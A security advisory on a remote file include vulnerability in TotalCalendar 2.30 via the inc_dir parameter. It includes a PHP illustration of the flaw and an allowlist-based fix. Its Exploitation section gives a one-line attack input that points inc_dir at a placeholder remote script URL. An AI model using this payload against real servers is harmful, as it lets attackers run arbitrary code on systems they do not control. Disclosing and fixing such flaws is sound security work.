TotalCalendar 2.30 - Remote File Include Vulnerability
SecurityAlert : 2290
CVE : CVE-2006-7055
SecurityRisk : High
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : David 'Aesthetico' Vieira-Kurz
Published : 27.02.2007
Affected Software :
TotalCalendar 2.30
Advisory Content :
[MajorSecurity] TotalCalendar 2.30 - Remote File Include Vulnerability
--------------------------------------------------------
Software: TotalCalendar
Version: 2.30
Type: Remote File Include Vulnerability
Date: April 23rd, 2006
Vendor: SweetPHP
Page: http://sweetphp.com
Risk: High
Affected Products:
----------------------------
TotalCalendar 2.30 and prior
Description:
----------------------------
TotalCalendar is the complete solution for all of your calendar and
schedule needs. TotalCalendar gives you the ability to create multiple
calendars and allows you to easily share and manage your events online.
The ability to allow user accounts lets you have other calendar members
help you manage your events, users, style, and much more.
Requirements:
----------------------------
register_globals = On
Vulnerability:
----------------------------
Input passed to the "inc_dir" parameter in "index.php" is not
properly verified before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
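The pattern behind the Vulnerability and Solution sections, as an added illustration that is not TotalCalendar's own code: a hypothetical index.php that builds its include path from a request-controlled variable, beside a hardened version that pins the directory to a constant and maps the request value through an allowlist. The file names in the allowlist and the "page" parameter are assumptions for the example.

```php
<?php
// Hypothetical reconstruction of the vulnerable pattern (not the vendor's code).
// With register_globals=On, a request parameter named inc_dir becomes the
// variable $inc_dir without any assignment in the script, so an attacker picks
// the prefix of the path passed to include(). A remote URL prefix is then
// fetched and executed, which is the remote file include described above.
//
//   include($inc_dir . 'header.php');   // vulnerable: $inc_dir is request data

// Hardened version: the include directory is a compile-time constant, never
// derived from request data, and the only request-controlled choice is a
// short name that is looked up in an allowlist of known files.
define('INC_DIR', __DIR__ . '/inc/');

/**
 * Map a request-supplied page name to a file inside INC_DIR.
 * Unknown names are rejected outright; the value is never spliced into a path.
 */
function resolve_include(string $name): string
{
    // Assumed allowlist of pages that index.php may pull in.
    $allowed = [
        'header' => 'header.php',
        'footer' => 'footer.php',
    ];
    if (!array_key_exists($name, $allowed)) {
        http_response_code(400);
        exit('invalid page');
    }
    return INC_DIR . $allowed[$name];
}

// Read the parameter explicitly from the request instead of relying on
// register_globals, so no unexpected request variable can shadow $inc_dir.
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'header';
require resolve_include($page);
```

Alongside the code fix, the php.ini settings register_globals=Off and allow_url_include=Off (available from PHP 5.2) stop request variables from appearing as globals and stop include() from loading remote URLs at all.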
Exploitation:
----------------------------
Post data:
inc_dir=http://www.yourspace.com/yourscript.php?
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use the contact form or email us at info()securityreason()com.